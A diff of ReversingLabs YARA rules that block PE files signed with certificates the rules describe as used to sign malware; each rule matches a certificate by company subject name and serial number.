-rule REVERSINGLABS_Cert_Blocklist_332Bd5801E8415585E72C87E0E2Ec71D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5B440A47E8Ce3Dd202271E5C7A666C78 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d251afda-7582-5a00-a100-fd3acff2f995"
+		id = "6f9852cb-277d-5942-b3f7-525593a41027"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11384-L11400"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5386-L5402"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3648c3a8dbcdbd24746b9fa8cb3071d5f5019e5917848d88437158c6cb165445"
+		logic_hash = "eb4387d58e391c356ed774d8c13bb4bbb2befed585bb44674459d3ef519aec58"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22349,21 +44743,21 @@ rule REVERSINGLABS_Cert_Blocklist_332Bd5801E8415585E72C87E0E2Ec71D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Marketing Strategies, Inc." and pe.signatures [ i ] . serial == "33:2b:d5:80:1e:84:15:58:5e:72:c8:7e:0e:2e:c7:1d" and 1662616824 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Master Networking s.r.o." and pe.signatures [ i ] . serial == "5b:44:0a:47:e8:ce:3d:d2:02:27:1e:5c:7a:66:6c:78" and 1601895571 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E3B80C0932B52A708477939B0D32186F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B82C6553B2186C219797621Aaa233Edb : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e7cdf040-3fe2-55ed-8f66-702fb4455653"
+		id = "e1dd9783-078f-582e-8493-7c493cda9c62"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11402-L11420"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5404-L5422"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "acdfce4dc25cbc9e9817453d5cf56c7d319bebdf7a039ea47412ec3b2f68cb02"
+		logic_hash = "72e3e1740a4adc4315d2dd9c9f7b8cee2d89c3006014dec663b70d3419f43ca3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22373,21 +44767,21 @@ rule REVERSINGLABS_Cert_Blocklist_E3B80C0932B52A708477939B0D32186F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BISOYETUTU LTD LIMITED" and ( pe.signatures [ i ] . serial == "00:e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" or pe.signatures [ i ] . serial == "e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" ) and 1617062400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MC Commerce SP Z o o" and ( pe.signatures [ i ] . serial == "00:b8:2c:65:53:b2:18:6c:21:97:97:62:1a:aa:23:3e:db" or pe.signatures [ i ] . serial == "b8:2c:65:53:b2:18:6c:21:97:97:62:1a:aa:23:3e:db" ) and 1585785600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C79F817F082986Bef3209F6723C8Da97 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F360F7Ad0Ed065Fec0B44F98E04481A0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b3978831-57d6-5f25-a271-fa4f449d37b3"
+		id = "96219c86-f463-5f11-950d-ca2af75d5559"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11422-L11440"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5424-L5442"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a5960f4c2ed768ccc5779d3754f51463c7b14a3a887c690944add23fba464f1a"
+		logic_hash = "2a25f1121f492dec461e570ff56acb0e3957cdf9100002f2ff0b6c3d3b35fee5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22397,21 +44791,21 @@ rule REVERSINGLABS_Cert_Blocklist_C79F817F082986Bef3209F6723C8Da97 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Al-Faris group d.o.o." and ( pe.signatures [ i ] . serial == "00:c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" or pe.signatures [ i ] . serial == "c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" ) and 1616371200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEHANIKUM OOO" and ( pe.signatures [ i ] . serial == "00:f3:60:f7:ad:0e:d0:65:fe:c0:b4:4f:98:e0:44:81:a0" or pe.signatures [ i ] . serial == "f3:60:f7:ad:0e:d0:65:fe:c0:b4:4f:98:e0:44:81:a0" ) and 1599031121 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1E5Efa53A14599Cc82F56F0790E20B17 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fe41941464B9992A69B7317418Ae8Eb7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f87dac0c-4b46-5b30-a715-f21e7c3a98e0"
+		id = "dd84a6b2-e616-5f93-af50-1a4fc15f3c45"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11442-L11458"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5444-L5462"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "78cbfeb5d7b58029a5b4107f2a59e892ff9d71788cf74e88ac823cb85ba35a94"
+		logic_hash = "bd5131f2b44deec6a7a68577b80ef4d066c331da2976539ce52ac6cff8d5560e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22421,21 +44815,21 @@ rule REVERSINGLABS_Cert_Blocklist_1E5Efa53A14599Cc82F56F0790E20B17 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Storeks LLC" and pe.signatures [ i ] . serial == "1e:5e:fa:53:a1:45:99:cc:82:f5:6f:07:90:e2:0b:17" and 1623196800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Milsean Software Limited" and ( pe.signatures [ i ] . serial == "00:fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" or pe.signatures [ i ] . serial == "fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" ) and 1599523200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Cf2D0B5Bfdd68Cf777A0C12F806A569 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C14B611A44A1Bae0E8C7581651845B6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2900c6ae-9e61-5bad-a7b4-b8eca925a1ea"
+		id = "116beeac-49c6-56b0-a1c0-855623f604d9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11460-L11476"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5464-L5480"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4d8fd52cd12f9512c0b148f9915860152f108884d29617a5fbfd62500d3a14c4"
+		logic_hash = "7f6028181e33e4ba8264ee367169e7259e19ff49dcae9a337a4ba78c06b459e6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22445,21 +44839,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Cf2D0B5Bfdd68Cf777A0C12F806A569 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROTIP d.o.o. - v ste\\xC4\\x8Daju" and pe.signatures [ i ] . serial == "0c:f2:d0:b5:bf:dd:68:cf:77:7a:0c:12:f8:06:a5:69" and 1611705600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NEEDCODE SP Z O O" and pe.signatures [ i ] . serial == "0c:14:b6:11:a4:4a:1b:ae:0e:8c:75:81:65:18:45:b6" and 1600300801 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_F675139Ea68B897A865A98F8E4611F00 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_690910Dc89D7857C3500Fb74Bed2B08D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3bac20a3-1415-53af-9d04-a30aa7488dd7"
+		id = "7c427b1a-fbe9-5e97-9810-87863c70988d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11478-L11496"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5482-L5498"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2306e90d376f5de8a4eb6d4a696bc1781686d7094cb0a2db48019ee93c1bf60a"
+		logic_hash = "3c5da6238279296854eb95ecaed802f453e80c6bceb71c3fa587df0f7d40cf96"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22469,21 +44863,21 @@ rule REVERSINGLABS_Cert_Blocklist_F675139Ea68B897A865A98F8E4611F00 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BS TEHNIK d.o.o." and ( pe.signatures [ i ] . serial == "00:f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" or pe.signatures [ i ] . serial == "f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" ) and 1606953600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OLIMP STROI, OOO" and pe.signatures [ i ] . serial == "69:09:10:dc:89:d7:85:7c:35:00:fb:74:be:d2:b0:8d" and 1597276800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4728189Fa0F57793484Cdf764F5E283D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fd41E6Bd7428D3008C8A05F68C9Ac6F2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fd1b83aa-bfcc-590c-8f97-875badf09698"
+		id = "ef59a76a-3b59-55a2-9da5-c3ba844bbe77"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11498-L11514"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5500-L5518"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9ec7e84c77583bd52ccfb8d6d5831f3634ed0a401d8103376c4775b7f2c43d81"
+		logic_hash = "e387664dc9aa746e127b4efb2ef43675f8fb6df66e99d33ef765e8fa306a4f18"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22493,21 +44887,21 @@ rule REVERSINGLABS_Cert_Blocklist_4728189Fa0F57793484Cdf764F5E283D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Power Save Systems s.r.o." and pe.signatures [ i ] . serial == "47:28:18:9f:a0:f5:77:93:48:4c:df:76:4f:5e:28:3d" and 1647302400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OM-FAS d.o.o." and ( pe.signatures [ i ] . serial == "00:fd:41:e6:bd:74:28:d3:00:8c:8a:05:f6:8c:9a:c6:f2" or pe.signatures [ i ] . serial == "fd:41:e6:bd:74:28:d3:00:8c:8a:05:f6:8c:9a:c6:f2" ) and 1575590400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9Bd81A9Adaf71F1Ff081C1F4A05D7Fd7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C7079866C0E48B01246Ba0C148E70D4D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "727167de-5678-558d-b948-8a40839d0500"
+		id = "2c985bd9-cb2a-553a-af63-a2a0a80cc641"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11516-L11534"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5520-L5538"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e275a1fd2eb931030fa8b5fc11cd1b335835aaa553a42455053cb93fef5e6e72"
+		logic_hash = "cc144760e0ca21fd98b55ac222db540900def61f54e9644f8cab5f711ec7bf24"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22517,21 +44911,21 @@ rule REVERSINGLABS_Cert_Blocklist_9Bd81A9Adaf71F1Ff081C1F4A05D7Fd7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMART TOYS AND GAMES, INC" and ( pe.signatures [ i ] . serial == "00:9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" or pe.signatures [ i ] . serial == "9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" ) and 1601683200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO GARANT" and ( pe.signatures [ i ] . serial == "00:c7:07:98:66:c0:e4:8b:01:24:6b:a0:c1:48:e7:0d:4d" or pe.signatures [ i ] . serial == "c7:07:98:66:c0:e4:8b:01:24:6b:a0:c1:48:e7:0d:4d" ) and 1588679105 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C81319D20C6F1F1Aec3398522189D90C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D591Da22F33C800A7024Aecff2Cd6C6D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0a196a18-002e-58e4-bff2-83d1a67a82ce"
+		id = "294cbf90-cd1f-5743-a51a-46e1d04ef34e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11536-L11554"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5540-L5558"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2a9f13f5e79a12f7e9d9d4a0dcaac065e1fc5167c67bc9f3fd7ba1c374b26d96"
+		logic_hash = "30e421d5ea3c5693c5c9bd0e3dd997ceda9755d17e3fb16d2a8e6c4a327ae32f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22541,21 +44935,21 @@ rule REVERSINGLABS_Cert_Blocklist_C81319D20C6F1F1Aec3398522189D90C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" or pe.signatures [ i ] . serial == "c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" ) and 1643500800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO T2 Soft" and ( pe.signatures [ i ] . serial == "00:d5:91:da:22:f3:3c:80:0a:70:24:ae:cf:f2:cd:6c:6d" or pe.signatures [ i ] . serial == "d5:91:da:22:f3:3c:80:0a:70:24:ae:cf:f2:cd:6c:6d" ) and 1588679107 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C318D876768258A696Ab9Dd825E27Acd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B36E0F2053Caee9C3B966F7Be0B40Fc3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c6e93547-5be0-5303-b537-655db3d78ad4"
+		id = "8ed732ae-1c25-59fc-8ebe-50a1eb81e4a9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11556-L11574"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5560-L5578"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "691b57929c93d14f8700e0e61170b9248499fd36b80aec90f2054c32d6a3a9eb"
+		logic_hash = "2444c78aefdb9e8c8004598a318db016d7e781ede6da2ba3ee85316456c3e77b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22565,21 +44959,21 @@ rule REVERSINGLABS_Cert_Blocklist_C318D876768258A696Ab9Dd825E27Acd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Genezis" and ( pe.signatures [ i ] . serial == "00:c3:18:d8:76:76:82:58:a6:96:ab:9d:d8:25:e2:7a:cd" or pe.signatures [ i ] . serial == "c3:18:d8:76:76:82:58:a6:96:ab:9d:d8:25:e2:7a:cd" ) and 1615161600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PARTS-JEST d.o.o." and ( pe.signatures [ i ] . serial == "00:b3:6e:0f:20:53:ca:ee:9c:3b:96:6f:7b:e0:b4:0f:c3" or pe.signatures [ i ] . serial == "b3:6e:0f:20:53:ca:ee:9c:3b:96:6f:7b:e0:b4:0f:c3" ) and 1600172855 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_06Df5C318759D6Ea9D090Bfb2Faf1D94 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5B320A2F46C99C1Ba1357Bee : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a61e61c1-9fa0-5fd9-b197-bb9d1b68c8f4"
+		id = "3912fdfc-7a84-51ce-abd2-977ad183af26"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11576-L11592"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5580-L5596"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5f151ee5781a15cca4394fdd8200162eae47e9d088a0b1551c9ed22ce11473a2"
+		logic_hash = "12797f80bce9d64c6c07e185aa309a0c4f910835745a7f2cc1874fb1211624d8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22589,21 +44983,21 @@ rule REVERSINGLABS_Cert_Blocklist_06Df5C318759D6Ea9D090Bfb2Faf1D94 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SpiffyTech Inc." and pe.signatures [ i ] . serial == "06:df:5c:31:87:59:d6:ea:9d:09:0b:fb:2f:af:1d:94" and 1634515201 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REGION TOURISM LLC" and pe.signatures [ i ] . serial == "5b:32:0a:2f:46:c9:9c:1b:a1:35:7b:ee" and 1602513116 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_02De1Cc6C487954592F1Bf574Ca2B000 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_08D4352185317271C1Cec9D05C279Af7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2a15d527-7f42-5c56-9740-9c2503a66f4f"
+		id = "0165920f-5f4d-5b35-990d-120786b4c5ba"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11594-L11610"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5598-L5614"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "40b78005d343684d08bb93e92c51eee10e674e8deb9eec290bc9ffe3b23061b1"
+		logic_hash = "b240962ab23729b241413ed1e53ac6541bf6b8a673c57522efd0cfe0c7eb9dd4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22613,21 +45007,21 @@ rule REVERSINGLABS_Cert_Blocklist_02De1Cc6C487954592F1Bf574Ca2B000 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orca System" and pe.signatures [ i ] . serial == "02:de:1c:c6:c4:87:95:45:92:f1:bf:57:4c:a2:b0:00" and 1613735394 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Retalit LLC" and pe.signatures [ i ] . serial == "08:d4:35:21:85:31:72:71:c1:ce:c9:d0:5c:27:9a:f7" and 1596585601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A32B8B4F1Be43C23Eb2848Ab4Ef06Bb2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B514E4C5309Ef9F27Add05Bedd4339A0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2ced71bb-622c-5597-91c3-210b9b5f3a4e"
+		id = "4b5abcfe-259e-5029-822b-c191b8d2c607"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11612-L11630"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5616-L5634"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "dd7d44349baaf4a2e2f61b38cef31f288110bb03944fd4593f52a0ab03b9d172"
+		logic_hash = "665b280218528bbe3d5c65d043266469e5288587ed9d85d01797bef7ce132a6f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22637,21 +45031,21 @@ rule REVERSINGLABS_Cert_Blocklist_A32B8B4F1Be43C23Eb2848Ab4Ef06Bb2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pak El AB" and ( pe.signatures [ i ] . serial == "00:a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" or pe.signatures [ i ] . serial == "a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" ) and 1673395200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SCABONE PTY LTD" and ( pe.signatures [ i ] . serial == "00:b5:14:e4:c5:30:9e:f9:f2:7a:dd:05:be:dd:43:39:a0" or pe.signatures [ i ] . serial == "b5:14:e4:c5:30:9e:f9:f2:7a:dd:05:be:dd:43:39:a0" ) and 1572566400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_626735Ed30E50E3E0553986D806Bfc54 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_13C7B92282Aae782Bfb00Baf879935F4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e0cfc0e6-b36e-5d4e-bfe6-21f13499dc0c"
